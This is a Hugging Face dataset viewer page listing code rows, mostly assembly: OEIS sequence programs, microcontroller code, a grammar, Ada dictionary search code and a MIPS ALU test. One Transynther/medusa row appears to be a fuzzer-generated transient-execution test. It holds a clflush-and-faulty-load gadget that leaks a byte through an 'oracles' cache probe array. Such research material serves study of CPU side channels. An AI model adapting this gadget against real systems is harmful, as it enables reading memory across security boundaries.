NLTuan/starcoderdata · Datasets at Hugging Face

max_stars_repo_path stringlengths 4 261	max_stars_repo_name stringlengths 6 106	max_stars_count int64 0 38.8k	id stringlengths 1 6	text stringlengths 7 1.05M
libsrc/_DEVELOPMENT/arch/zxn/esxdos/c/sdcc_iy/p3dos_cstr_to_pstr.asm	jpoikela/z88dk	640	9080	<reponame>jpoikela/z88dk<gh_stars>100-1000 ; unsigned char p3dos_cstr_to_pstr(unsigned char s) SECTION code_esxdos PUBLIC _p3dos_cstr_to_pstr EXTERN asm_p3dos_cstr_to_pstr _p3dos_cstr_to_pstr: pop af pop hl push hl push af jp asm_p3dos_cstr_to_pstr
programs/oeis/056/A056737.asm	neoneye/loda	22	247798	; A056737: Minimum nonnegative integer m such that n = k*(k+m) for some positive integer k. ; 0,1,2,0,4,1,6,2,0,3,10,1,12,5,2,0,16,3,18,1,4,9,22,2,0,11,6,3,28,1,30,4,8,15,2,0,36,17,10,3,40,1,42,7,4,21,46,2,0,5,14,9,52,3,6,1,16,27,58,4,60,29,2,0,8,5,66,13,20,3,70,1,72,35,10,15,4,7,78,2,0,39,82,5,12,41,26,3,88,1,6,19,28,45,14,4,96,7,2,0 mov $2,$0 seq $0,33677 ; Smallest divisor of n >= sqrt(n). mov $1,1 div $2,$0 add $2,1 sub $2,$0 add $2,1 sub $1,$2 mov $0,$1
test/Compiler/simple/Erased-cubical-Pattern-matching-Erased.agda	sseefried/agda	1	8198	{-# OPTIONS --erased-cubical --save-metas #-} module Erased-cubical-Pattern-matching-Erased where open import Agda.Builtin.String open import Erased-cubical-Pattern-matching-Cubical -- If c₁ and c₂ are treated as erased, then f might be compiled to -- something akin to ⊥-elim. However, the main module uses -- --cubical, not --erased-cubical, so f should not be compiled in -- that way. f : D → String f c₁ = "Success\n" f c₂ = "Failure\n"
Transynther/x86/_processed/NONE/_zr_xt_/i3-7100_9_0x84_notsx.log_21829_2424.asm	ljhsiun2/medusa	9	165973	.global s_prepare_buffers s_prepare_buffers: push %r10 push %r11 push %r13 push %r9 push %rsi lea addresses_UC_ht+0xd272, %r9 nop nop nop sub $21575, %rsi movb (%r9), %r13b nop nop nop nop xor %r11, %r11 lea addresses_WC_ht+0x13a72, %r10 nop nop nop cmp %r9, %r9 mov $0x6162636465666768, %r13 movq %r13, %xmm5 movups %xmm5, (%r10) nop nop nop nop nop sub $58566, %rsi pop %rsi pop %r9 pop %r13 pop %r11 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r14 push %r15 push %rax push %rbp push %rbx push %rdi // Store lea addresses_PSE+0x18432, %r10 nop nop nop nop and $5820, %r15 mov $0x5152535455565758, %rbp movq %rbp, %xmm5 vmovups %ymm5, (%r10) nop nop nop dec %r15 // Faulty Load lea addresses_A+0x3672, %rbp clflush (%rbp) nop nop cmp %rbx, %rbx movb (%rbp), %r14b lea oracles, %rbx and $0xff, %r14 shlq $12, %r14 mov (%rbx,%r14,1), %r14 pop %rdi pop %rbx pop %rbp pop %rax pop %r15 pop %r14 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_A', 'same': False, 'size': 16, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_PSE', 'same': False, 'size': 32, 'congruent': 6, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_A', 'same': True, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 1, 'congruent': 10, 'NT': False, 'AVXalign': True}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_WC_ht', 'same': False, 'size': 16, 'congruent': 6, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'00': 1, '35': 21828} 00 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 */
Whilelang.g4	tealflipper/tinyParser	0	3202	grammar Whilelang; program: seqStatement; seqStatement: statement (';' statement)* ; statement: ID ':=' expression # attrib \| 'skip' # skip \| 'if' bool 'then' statement 'else' statement # if \| 'while' bool 'do' statement # while \| 'print' Text # print \| 'print' expression # write \| '{' seqStatement '}' # block; expression: INT # int \| 'read' # read \| expression op = ('' \| '/' \| '^') expression # MulDivPow \| expression op = ('+' \| '-') expression # AddSub \| op = ('log' \| 'ln') expression # log \| op = ('sin' \| 'cos' \| 'tan') expression # trig \| op = ('asin' \| 'acos' \| 'atan') expression # invTrig \| 'sqrt' expression # sqrt \| FLOAT # float \| ID # id \| PI # pi \| E # euler \| '(' expression ')' # parens ; bool: ('true' \| 'false') # boolean \| expression op='=' expression # relOp \| expression op='<=' expression # relOp \| 'not' bool # not \| bool 'and' bool # and \| '(' bool ')' # boolParen; FLOAT: ('0'..'9')+ \| ('0'..'9')+ '.' ('0'..'9') EXPONENT? \| '.' ('0'..'9')+ EXPONENT? \| ('0'..'9')+ EXPONENT ; EXPONENT: ('e'\|'E') ('+'\|'-')? ('0'..'9')+ ; MUL: ''; DIV: '/'; ADD: '+'; SUB: '-'; POW: '^'; LOG10: 'log'; LN: 'ln'; COS: 'cos'; TAN: 'tan'; SIN: 'sin'; ACOS: 'acos'; ASIN: 'asin'; ATAN: 'atan'; SQRT: 'sqrt'; PI: ('pi'); E: 'e'; INT: ('0' ..'9')+; ID: ('a' ..'z')+; Text: '"' .? '"'; SPACE: [ \t\n\r]+ -> skip;
unordnung_auch_assembler/asm/attiny13/4x4display/allOn.asm	no-go/Blink_atmega328p	0	25850	<filename>unordnung_auch_assembler/asm/attiny13/4x4display/allOn.asm .include "myTiny13.h" ; 0 1 2 3 up = minus ; 4 5 6 7 ; 4 5 6 7 down = minus ; 0 1 2 3 Main: ;initial values ; down up ; \/ ldi A, 0b00011111 ; up- , down- / 7 6 5 4 / 3 2 1 0 out DDRB, A Loop: ; down up ; \/ ldi A, 0b00001000 out PORTB, A ldi A, 0b00001001 out PORTB, A ldi A, 0b00001010 out PORTB, A ldi A, 0b00001011 out PORTB, A ; ----------------------- ; down up ; \/ ldi A, 0b00001100 out PORTB, A ldi A, 0b00001101 out PORTB, A ldi A, 0b00001110 out PORTB, A ldi A, 0b00001111 out PORTB, A ; ----------------------- ; down up ; \/ ldi A, 0b00010100 out PORTB, A ldi A, 0b00010101 out PORTB, A ldi A, 0b00010110 out PORTB, A ldi A, 0b00010111 out PORTB, A ; ----------------------- ; down up ; \/ ldi A, 0b00010000 out PORTB, A ldi A, 0b00010001 out PORTB, A ldi A, 0b00010010 out PORTB, A ldi A, 0b00010011 out PORTB, A ; ----------------------- rjmp Loop
programs/oeis/130/A130784.asm	neoneye/loda	22	82030	<reponame>neoneye/loda<gh_stars>10-100 ; A130784: Period 3: repeat [1, 3, 2]. ; 1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3,2,1,3 mul $0,2 mod $0,3 add $0,1
nasm/assgnment1/p1.asm	codingneverends/assembly	0	169168	<filename>nasm/assgnment1/p1.asm section .data name : db '<NAME>',10 l : equ $-name add1 : db 'Eckamattathil house, Thattakuzha P O',0ah l1 : equ $-add1 add2 : db 'Thattakuzha',0ah l2 : equ $-add2 add3 : db 'Idukki , 685581',0ah l3 : equ $-add3 section .text global _start: _start: mov eax, 4 mov ebx, 1 mov ecx, name mov edx, l int 80h mov eax, 4 mov ebx, 1 mov ecx, add1 mov edx, l1 int 80h mov eax, 4 mov ebx, 1 mov ecx, add2 mov edx, l2 int 80h mov eax, 4 mov ebx, 1 mov ecx, add3 mov edx, l3 int 80h mov eax, 1 mov ebx, 0 int 80h
src/words_engine/words_engine-search_english.adb	spr93/whitakers-words	204	449	-- WORDS, a Latin dictionary, by <NAME> (USAF, Retired) -- -- Copyright <NAME> (1936–2010) -- -- This is a free program, which means it is proper to copy it and pass -- it on to your friends. Consider it a developmental item for which -- there is no charge. However, just for form, it is Copyrighted -- (c). Permission is hereby freely given for any and all use of program -- and data. You can sell it as your own, but at least tell me. -- -- This version is distributed without obligation, but the developer -- would appreciate comments and suggestions. -- -- All parts of the WORDS system, source code and data files, are made freely -- available to anyone who wishes to use them, for whatever purpose. with Ada.Text_IO; use Ada.Text_IO; with Latin_Utils.Strings_Package; use Latin_Utils.Strings_Package; with Latin_Utils.Config; with Support_Utils.Word_Parameters; use Support_Utils.Word_Parameters; with Latin_Utils.Inflections_Package; use Latin_Utils.Inflections_Package; with Latin_Utils.Dictionary_Package; use Latin_Utils.Dictionary_Package; with Support_Utils.Developer_Parameters; use Support_Utils.Developer_Parameters; with Words_Engine.Word_Package; use Words_Engine.Word_Package; with Words_Engine.English_Support_Package; use Words_Engine.English_Support_Package; with Support_Utils.Dictionary_Form; use Latin_Utils; procedure Words_Engine.Search_English (Input_English_Word : String; Pofs : Part_Of_Speech_Type := X) is use Ewds_Direct_Io; Input_Word : Eword := Lower_Case (Head (Input_English_Word, Eword_Size)); Input_Pofs : constant Part_Of_Speech_Type := Pofs; Output_Array : Ewds_Array (1 .. 500) := (others => Null_Ewds_Record); Number_Of_Hits : Integer := 0; J1, J2, J : Ewds_Direct_Io.Count := 0; D_K : constant Dictionary_Kind := General; -- For the moment Ewds : Ewds_Record := Null_Ewds_Record; First_Try, Second_Try : Boolean := True; procedure Load_Output_Array (Ewds : in Ewds_Record) is begin if Ewds.Pofs <= Input_Pofs then Number_Of_Hits := Number_Of_Hits + 1; Output_Array (Number_Of_Hits) := Ewds; end if; end Load_Output_Array; --procedure TRIM_OUTPUT_ARRAY is procedure Sort_Output_Array is Hits : Integer := 0; begin -- Bubble sort Hit_Loop : loop Hits := 0; Switch : declare Dw : Ewds_Record := Null_Ewds_Record; begin Inner_Loop : -- Order by RANK, FREQ, SEMI for I in 1 .. Number_Of_Hits - 1 loop if Output_Array (I + 1).Rank > Output_Array (I).Rank or else (Output_Array (I + 1).Rank = Output_Array (I).Rank and then Output_Array (I + 1).Freq < Output_Array (I).Freq) or else (Output_Array (I + 1).Rank = Output_Array (I).Rank and then Output_Array (I + 1).Freq = Output_Array (I).Freq and then Output_Array (I + 1).Semi < Output_Array (I).Semi) then Dw := Output_Array (I); Output_Array (I) := Output_Array (I + 1); Output_Array (I + 1) := Dw; Hits := Hits + 1; --PUT_LINE ("HITS " & INTEGER'IMAGE (HITS)); end if; end loop Inner_Loop; end Switch; exit Hit_Loop when Hits = 0; end loop Hit_Loop; end Sort_Output_Array; procedure Dump_Output_Array (Output : in Ada.Text_IO.File_Type) is De : Dictionary_Entry := Null_Dictionary_Entry; Number_To_Show : Integer := Number_Of_Hits; One_Screen : constant Integer := 6; begin --TEXT_IO.PUT_LINE ("DUMP_OUTPUT"); if Number_Of_Hits = 0 then Ada.Text_IO.Put_Line (Output, "No Match"); else Sort_Output_Array; --TEXT_IO.PUT_LINE ("DUMP_OUTPUT SORTED"); Trimmed := False; if Words_Mode (Trim_Output) then if Number_Of_Hits > One_Screen then Number_To_Show := One_Screen; Trimmed := True; else Number_To_Show := Number_Of_Hits; end if; end if; for I in 1 .. Number_To_Show loop Ada.Text_IO.New_Line (Output); Do_Pause : begin if Integer (Ada.Text_IO.Line (Output)) > Scroll_Line_Number + Config.Output_Screen_Size then Pause (Output); Scroll_Line_Number := Integer (Ada.Text_IO.Line (Output)); end if; end Do_Pause; Dict_IO.Read (Dict_File (General), De, Dict_IO.Count (Output_Array (I).N)); Put (Output, Support_Utils.Dictionary_Form (De)); Ada.Text_IO.Put (Output, " "); if De.Part.Pofs = N then Ada.Text_IO.Put (Output, " "); Decn_Record_IO.Put (Output, De.Part.N.Decl); Ada.Text_IO.Put (Output, " " & Gender_Type'Image (De.Part.N.Gender) & " "); end if; if De.Part.Pofs = V then Ada.Text_IO.Put (Output, " "); Decn_Record_IO.Put (Output, De.Part.V.Con); end if; if (De.Part.Pofs = V) and then (De.Part.V.Kind in Gen .. Perfdef) then Ada.Text_IO.Put (Output, " " & Verb_Kind_Type'Image (De.Part.V.Kind) & " "); end if; if Words_Mdev (Show_Dictionary_Codes) then Ada.Text_IO.Put (Output, " ["); -- FIXME: Why noy Translation_Record_IO.Put ? Age_Type_IO.Put (Output, De.Tran.Age); Area_Type_IO.Put (Output, De.Tran.Area); Geo_Type_IO.Put (Output, De.Tran.Geo); Frequency_Type_IO.Put (Output, De.Tran.Freq); Source_Type_IO.Put (Output, De.Tran.Source); Ada.Text_IO.Put (Output, "] "); end if; if Words_Mdev (Show_Dictionary) then Ada.Text_IO.Put (Output, Ext (D_K) & ">"); end if; --TEXT_IO.PUT_LINE ("DUMP_OUTPUT SHOW"); if Words_Mdev (Show_Dictionary_Line) then Ada.Text_IO.Put (Output, "(" & Trim (Integer'Image (Output_Array (I).N)) & ")"); end if; Ada.Text_IO.New_Line (Output); --TEXT_IO.PUT_LINE ("DUMP_OUTPUT MEAN"); Ada.Text_IO.Put (Output, Trim (De.Mean)); Ada.Text_IO.New_Line (Output); end loop; --TEXT_IO.PUT_LINE ("DUMP_OUTPUT TRIMMED"); if Trimmed then Put_Line (Output, "*"); end if; end if; -- On HITS = 0 exception when others => null; -- If N not in DICT_FILE end Dump_Output_Array; begin J1 := 1; J2 := Size (Ewds_File); First_Try := True; Second_Try := True; J := (J1 + J2) / 2; Binary_Search : loop -- TEXT_IO.PUT_LINE ("J = " & INTEGER'IMAGE (INTEGER (J))); if (J1 = J2 - 1) or (J1 = J2) then if First_Try then J := J1; First_Try := False; elsif Second_Try then J := J2; Second_Try := False; else exit Binary_Search; end if; end if; -- Should D_K Set_Index (Ewds_File, J); Read (Ewds_File, Ewds); if "<"(Lower_Case (Ewds.W), Input_Word) then -- Not LTU, not u=v J1 := J; J := (J1 + J2) / 2; elsif ">"(Lower_Case (Ewds.W), Input_Word) then J2 := J; J := (J1 + J2) / 2; else for I in reverse J1 .. J loop Set_Index (Ewds_File, Ewds_Direct_Io.Count (I)); Read (Ewds_File, Ewds); -- Reads and advances index!! if "="(Lower_Case (Ewds.W), Input_Word) then Load_Output_Array (Ewds); else exit; end if; end loop; for I in J + 1 .. J2 loop Set_Index (Ewds_File, Ewds_Direct_Io.Count (I)); Read (Ewds_File, Ewds); if "="(Lower_Case (Ewds.W), Input_Word) then Load_Output_Array (Ewds); else exit Binary_Search; end if; end loop; exit Binary_Search; end if; end loop Binary_Search; if Words_Mode (Write_Output_To_File) then Dump_Output_Array (Output); else Dump_Output_Array (Current_Output); end if; exception when others => Ada.Text_IO.Put_Line ("exception SEARCH NUMBER_OF_HITS = " & Integer'Image (Number_Of_Hits)); raise; end Words_Engine.Search_English;
data/pokemon/base_stats/bibarel.asm	TastySnax12/pokecrystal16-493-plus	2	83761	<reponame>TastySnax12/pokecrystal16-493-plus<filename>data/pokemon/base_stats/bibarel.asm db 0 ; species ID placeholder db 79, 85, 60, 71, 55, 60 ; hp atk def spd sat sdf db NORMAL, WATER ; type db 127 ; catch rate db 144 ; base exp db BERRY, GOLD_BERRY ; items db GENDER_F50 ; gender ratio db 100 ; unknown 1 db 15 ; step cycles to hatch db 5 ; unknown 2 INCBIN "gfx/pokemon/bibarel/front.dimensions" db 0, 0, 0, 0 ; padding db GROWTH_MEDIUM_FAST ; growth rate dn EGG_GROUND, EGG_WATER_1 ; egg groups ; tm/hm learnset tmhm HEADBUTT, CURSE, ROLLOUT, TOXIC, ZAP_CANNON, ROCK_SMASH, HIDDEN_POWER, SUNNY_DAY, SNORE, BLIZZARD, HYPER_BEAM, ICY_WIND, PROTECT, RAIN_DANCE, ENDURE, FRUSTRATION, IRON_TAIL, THUNDER, RETURN, DIG, SHADOW_BALL, MUD_SLAP, DOUBLE_TEAM, SWAGGER, SLEEP_TALK, SWIFT, DEFENSE_CURL, REST, ATTRACT, THIEF, FURY_CUTTER, CUT, SURF, STRENGTH, WHIRLPOOL, WATERFALL, THUNDERBOLT, ICE_BEAM ; end
programs/oeis/013/A013755.asm	neoneye/loda	22	104685	<reponame>neoneye/loda ; A013755: a(n) = 14^(3*n + 2). ; 196,537824,1475789056,4049565169664,11112006825558016,30491346729331195904,83668255425284801560576,229585692886981495482220544,629983141281877223603213172736,1728673739677471101567216945987584 mov $1,2744 pow $1,$0 sub $1,1 mul $1,196 add $1,196 mov $0,$1
Examples/ch10/HelloNew.asm	satadriver/LiunuxOS_t	0	24456	TITLE Macro Functions (HelloNew.asm) ; This program shows how to use macros to configure ; a program to run on multiple platforms. ; Last update: 8/16/01. INCLUDE Macros.inc IF IsDefined( RealMode ) INCLUDE Irvine16.inc ELSE INCLUDE Irvine32.inc ENDIF .code main PROC Startup mWriteLn "This program can be assembled to run " mWriteLn "in both Real mode and Protected mode." exit main ENDP END main
programs/oeis/161/A161416.asm	neoneye/loda	22	105147	<reponame>neoneye/loda ; A161416: Partial sums of A056737. ; 0,1,3,3,7,8,14,16,16,19,29,30,42,47,49,49,65,68,86,87,91,100,122,124,124,135,141,144,172,173,203,207,215,230,232,232,268,285,295,298,338,339,381,388,392,413,459,461,461,466,480,489,541,544,550,551,567,594 mov $2,$0 mov $3,$0 lpb $2 mov $0,$3 sub $2,1 sub $0,$2 seq $0,56737 ; Minimum nonnegative integer m such that n = k*(k+m) for some positive integer k. add $1,$0 lpe mov $0,$1
oeis/040/A040006.asm	neoneye/loda-programs	11	85334	; A040006: Continued fraction for sqrt(10). ; Submitted by <NAME> ; 3,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6 min $0,1 add $0,1 mul $0,3
programs/oeis/120/A120891.asm	jmorken/loda	1	28141	<filename>programs/oeis/120/A120891.asm ; A120891: Number of primitive Pythagorean triangles with odd leg 2n-1. ; 0,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,2,2,1,2,1,1,2,1,1,2,1,2,2,1,1,2,2,1,2,1,1,2,2,1,1,1,2,2,1,2,2,2,1,2,1,1,4,1,1,2,1,2,2,2,1,2,1,1,2,1,2,2,1,1,2,2,2,2,1,1,2,2,1,2,2,1,4,1,1,2,1,2,2,1,1,2,2,2,2,1,1,4,1,1,2,2,2,2,2,1,2,2,2,2,2,1,2,1,1,4,1,2,2,1,1,1,2,2,2,1,2,4,1,2,2,1,2,2,1,1,4,2,1,2,1,1,4,2,1,2,1,2,2,2,2,2,2,1,2,1,1,4,1,2,2,2,2,2,2,1,2,2,1,2,2,1,4,1,1,2,1,2,4,1,1,2,2,1,2,2,1,2,2,1,2,1,4,2,1,2,2,2,1,4,1,2,2,2,1,2,2,2,2,1,1,2,2,2,4,1,1,4,2,1,2,1,2,2,1,2,2,4,1,2,1,1,4,1,2,2,2,2,2,1,2,4,2,1,2,1,2,4,2,1 mul $0,2 cal $0,34444 ; a(n) is the number of unitary divisors of n (d such that d divides n, gcd(d, n/d) = 1). mov $1,$0 div $1,2 sub $1,1 mul $1,2 add $1,2 div $1,2
P6/data_P6_2/ALUTest145.asm	alxzzhou/BUAA_CO_2020	1	28279	<gh_stars>1-10 addiu $0,$3,2556 sltiu $1,$5,-16531 srl $4,$4,24 sltu $1,$5,$3 lb $3,13($0) xori $1,$1,15331 slt $1,$1,$3 or $1,$3,$3 lh $3,6($0) lh $3,6($0) slt $0,$0,$3 addiu $3,$3,-16857 slti $1,$3,10310 ori $5,$5,41522 ori $5,$3,12904 addu $4,$4,$3 subu $3,$3,$3 or $4,$6,$3 lb $3,4($0) lbu $1,12($0) addiu $6,$4,-15701 sll $4,$3,5 lh $4,0($0) xori $3,$3,8082 xor $5,$1,$3 xori $4,$4,26387 sltiu $5,$5,-4691 ori $3,$4,65095 subu $3,$5,$3 sw $3,12($0) sltu $1,$1,$3 addiu $3,$5,-22526 sra $6,$5,26 sltiu $4,$4,-24596 addiu $3,$1,18230 sll $5,$3,6 srav $4,$4,$3 lbu $0,11($0) sb $3,9($0) lhu $4,8($0) xori $4,$4,52650 sb $3,9($0) lh $4,2($0) slti $1,$0,21653 srlv $1,$1,$3 subu $4,$6,$3 srav $5,$5,$3 addiu $3,$3,-17634 lhu $5,12($0) addiu $3,$4,-30104 sll $3,$6,1 slt $1,$3,$3 slt $1,$5,$3 lhu $3,14($0) srl $3,$3,8 addu $3,$5,$3 lh $1,0($0) srl $4,$4,6 sra $5,$0,11 addu $5,$3,$3 xor $5,$4,$3 xor $5,$5,$3 slt $3,$4,$3 lhu $1,4($0) addu $3,$3,$3 addiu $3,$6,21720 lh $3,4($0) sh $3,10($0) subu $6,$5,$3 srl $2,$2,13 andi $5,$5,57227 nor $5,$5,$3 lb $6,7($0) sra $5,$6,11 lb $4,10($0) sltiu $3,$4,8839 addu $1,$1,$3 andi $3,$3,58816 sltiu $3,$6,-22354 srav $3,$3,$3 sltiu $4,$4,-7269 xor $1,$1,$3 lb $4,6($0) xor $4,$4,$3 or $1,$3,$3 subu $0,$4,$3 lb $0,8($0) or $3,$5,$3 sltu $5,$5,$3 sh $4,4($0) lhu $5,12($0) xori $5,$0,63817 sllv $3,$3,$3 addiu $3,$4,22359 sb $3,3($0) lbu $2,8($0) nor $3,$3,$3 srl $4,$2,21 addu $3,$3,$3 addiu $1,$1,-14114 sra $3,$6,19 slti $3,$6,-566 sllv $4,$3,$3 addu $3,$3,$3 nor $0,$3,$3 sltu $5,$5,$3 lw $4,0($0) sw $4,4($0) sb $1,16($0) addiu $3,$3,3193 srlv $1,$1,$3 and $0,$6,$3 sh $4,16($0) sra $0,$5,12 xori $1,$3,23781 xori $4,$1,53096 andi $4,$3,15200 andi $5,$5,43847 nor $3,$5,$3 sll $0,$2,7 subu $4,$3,$3 xor $1,$3,$3 and $3,$3,$3 sra $6,$6,27 and $0,$1,$3 and $1,$1,$3 andi $3,$3,15497 addu $5,$3,$3 sltiu $1,$4,3022 lhu $3,16($0) addu $4,$0,$3 srav $1,$4,$3 sb $5,0($0) ori $5,$5,27067 sw $5,12($0) sra $0,$3,30 nor $5,$5,$3 sh $4,16($0) subu $4,$4,$3 sh $4,16($0) lhu $4,12($0) srlv $3,$4,$3 lhu $3,6($0) lb $4,10($0) subu $4,$4,$3 subu $3,$4,$3 sll $6,$6,15 addiu $3,$3,5309 sll $3,$4,16 addiu $1,$0,9487 sra $3,$3,3 addu $4,$2,$3 sltu $4,$2,$3 sra $3,$4,8 xori $3,$4,39702 srlv $1,$1,$3 sw $5,16($0) addu $4,$4,$3 lw $3,12($0) lh $5,4($0) addu $5,$5,$3 lbu $6,6($0) lbu $6,16($0) srlv $3,$3,$3 sll $1,$4,22 subu $4,$3,$3 sra $6,$5,25 sw $3,12($0) sll $4,$4,8 sltu $0,$0,$3 lh $0,12($0) slt $3,$4,$3 lbu $4,14($0) addu $4,$4,$3 subu $4,$4,$3 sb $6,16($0) andi $4,$4,59812 andi $1,$3,46230 srlv $4,$3,$3 subu $3,$3,$3 subu $3,$1,$3 subu $4,$6,$3 xor $4,$4,$3 sw $5,12($0) sh $3,6($0) andi $4,$4,60881 andi $4,$3,47698 addu $3,$5,$3 addiu $5,$5,-24859 subu $6,$4,$3 addiu $3,$3,6143 srl $3,$6,22 subu $3,$3,$3 and $4,$3,$3 or $0,$3,$3 sll $0,$0,20 sltiu $5,$4,-18311 ori $1,$5,41361 lh $5,12($0) sltiu $1,$3,21037 lb $3,5($0) sllv $1,$1,$3 addu $3,$5,$3 sh $3,14($0) lw $4,4($0) or $3,$4,$3 and $3,$5,$3 sllv $5,$3,$3 srav $3,$3,$3 or $1,$5,$3 sllv $5,$3,$3 srlv $3,$4,$3 addu $6,$3,$3 sltiu $1,$1,22869 sh $4,4($0) xori $3,$6,40283 sllv $4,$4,$3 lh $5,12($0) lw $5,0($0) srav $3,$6,$3 sltiu $1,$6,-24230 and $3,$4,$3 or $3,$3,$3 slt $4,$3,$3 sltiu $1,$4,-15842 sll $4,$6,21 subu $4,$1,$3 srl $1,$4,8 srl $4,$3,28 srav $6,$6,$3 and $1,$1,$3 sllv $3,$3,$3 nor $1,$6,$3 addiu $3,$3,25001 sra $3,$1,0 lbu $3,3($0) addu $1,$2,$3 addu $5,$5,$3 sra $4,$4,22 slt $3,$3,$3 sltu $3,$4,$3 andi $1,$3,33704 xori $1,$6,51442 sltiu $4,$2,-26021 ori $1,$5,39805 sltu $3,$1,$3 sw $1,4($0) and $4,$4,$3 sw $3,16($0) andi $4,$4,42227 xori $4,$3,1060 srlv $5,$3,$3 sh $5,6($0) slti $3,$4,-21697 subu $5,$3,$3 sb $5,5($0) sb $5,4($0) xor $5,$3,$3 addiu $3,$1,-12493 slti $3,$1,30556 lh $3,6($0) srlv $1,$4,$3 sltiu $3,$3,-12437 sltiu $4,$1,-25351 andi $5,$6,62771 srav $3,$3,$3 xori $5,$4,17219 sltu $0,$3,$3 srlv $3,$4,$3 slti $5,$1,10402 addu $1,$3,$3 addiu $0,$3,-17700 lh $3,12($0) addiu $0,$0,-8928 addiu $3,$3,-24765 lb $6,8($0) nor $5,$5,$3 sb $4,3($0) addu $3,$2,$3 xor $3,$5,$3 slti $0,$4,-4081 sb $5,2($0) sllv $4,$5,$3 sllv $5,$0,$3 srav $1,$4,$3 lbu $3,1($0) nor $4,$3,$3 and $1,$3,$3 lb $3,10($0) addiu $5,$1,-22387 sllv $6,$3,$3 slt $3,$0,$3 ori $3,$3,24643 ori $4,$4,15453 or $4,$4,$3 lhu $4,10($0) lhu $3,4($0) srl $4,$6,12 srav $6,$4,$3 